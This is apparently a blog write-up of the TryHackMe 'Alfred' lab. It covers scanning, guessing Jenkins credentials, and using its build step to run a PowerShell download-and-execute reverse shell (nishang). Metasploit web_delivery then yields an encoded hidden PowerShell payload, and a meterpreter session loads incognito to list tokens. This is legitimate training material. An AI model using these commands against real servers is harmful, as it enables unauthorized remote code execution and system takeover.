writeup TryHackMe Alfred

To
5 min readApr 2, 2021

Tag: nishang, jenkins, pentesting, tryhackme
Attack surface: file upload
Core target: upload nishang to target machine and execute. Msf switching shell.

summary:
- Jenkins can execute command on Worker-Machine(Target).
- The attacker provides an downloading-files-infrastructure.
- nishang is a professional tool for dealing with windows powershell

steps:
- nmap scan find basic info gather web service
- jenkins run on ip:port
- guess username&password
- configure jenkins run command
- run download-file-infrastructure
- set powershell security level
- execute nisang gather target-machine info
- find user.txt

scan

$nmap -sC -sV -oN initial ip_address                          1 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 01:24 EDT
Nmap scan report for ip_address
Host is up (0.26s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2021-04-01T03:47:29
|_Not valid after: 2021-10-01T03:47:29
|_ssl-date: 2021-04-02T05:25:21+00:00; -1s from scanner time.
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.93 seconds

http server A run on port 80 (Static website) http server B run on port 8080 (Jenkins Service),direct to ip:8080/job/project/configure

Build Box write script, update script here, Save & Apply

whoami

new script

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

return infra machine

You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
python3 -m http.server
nc -lnvp 4444

return Jenkins Build Now

PS C:\Users> gci -recurse -filter "user.txt"Directory: C:\Users\bruce\DesktopMode                LastWriteTime     Length Name                              
---- ------------- ------ ----
-a--- 10/25/2019 11:22 PM 32 user.txt
PS C:\Users> type C:\Users\bruce\Desktop\user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
PS C:\Users>

switching shell payload

PS C:\Program Files (x86)\Jenkins\workspace\project> whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
PS C:\Program Files (x86)\Jenkins\workspace\project>

switching

use official, will hangout. Jenkins task finish success. So i use two wriup

https://www.aldeid.com/wiki/TryHackMe-Alfred#.5BTask_2.5D_Switching_Shells

they bose use exploit/multi/script/web_delivery

set PAYLOAD & LPORT & LHOST & target =>generate command


msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.9.213.205 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:Id Name
-- ----
2 PSH
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.9.213.205:4444
[*] Using URL: http://0.0.0.0:8080/Z3smQp
[*] Local IP: http://10.9.213.205:8080/Z3smQp
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6...

input conde from poswershell to end. into Jenkins. Build Now

sessions

Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows alfred\bruce @ ALFRED 10.9.213.205:4444 -> 10.10.179.139:49758 (10.10.179.139)
msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...
meterpreter >
meterpreter >
meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2021-04-04 01:09:01 -0400 shell.exe

nice ~

msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2021-04-04 01:09:01 -0400 shell.exe
meterpreter > whoami
[-] Unknown command: whoami.

remermber use shell,

meterpreter > shell
Process 780 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Jenkins\workspace\project>^Z
Background channel 1? [y/N] y
meterpreter > ls
Listing: C:\Program Files (x86)\Jenkins\workspace\project
=========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2021-04-04 01:09:01 -0400 shell.exe
meterpreter >
meterpreter > load incognto
Loading extension incognto...
[-] Failed to load extension: Unable to load extension 'incognto' - module does not exist.
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================

oh ops. tryhackme sometime will down the room. restart.

msfconsole -q

q parameters means remoe the lunch banner. but i like the banner. hhh

waht is Incognito

following the task, the rest is easy.

--

--

To
0 Followers

After or as you die, you sit in a cinema.